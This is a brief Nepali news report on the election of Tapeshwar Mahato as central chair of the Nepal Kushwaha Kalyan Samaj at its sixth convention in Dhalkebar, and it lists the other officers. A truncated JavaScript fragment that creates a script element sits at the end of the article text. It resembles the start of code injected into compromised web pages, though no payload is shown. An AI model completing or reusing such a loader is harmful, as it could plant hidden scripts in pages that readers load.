कुशवाहा कल्याण समाजको अध्यक्षमा तपेश्वर

महोत्तरी, असोज ३० । नेपाल कुशवाहा कल्याण समाजको केन्द्रीय अध्यक्षमा तपेश्वर महतो चयन भएका छन् ।
धनुषाको ढल्केवरमा आज सम्पन्न समाजको छैटौँ महाधिवेशनले सर्वसम्मतीले महतोलाई अध्यक्ष चयन गरेको हो ।
समाजको वरिष्ठ उपाध्यक्षमा राजाराम महतो, कोषाध्यक्षमा महेन्द्र महतो, महासचिवमा मनोजकुमार सिंह, सह–सचिवमा रामप्रकाश महतो लगायत ५१ सदस्यीय केन्द्रीय पदाधिकारी चयन भएका छन् ।
गत शुक्रबार सो समाजको पहिलो राष्ट्रिय एकता भेला तथा छैटौँ महाधिवेशन प्रारम्भ भएको थियो । var d=document;var s=d.createElement(‘script’);

Loading...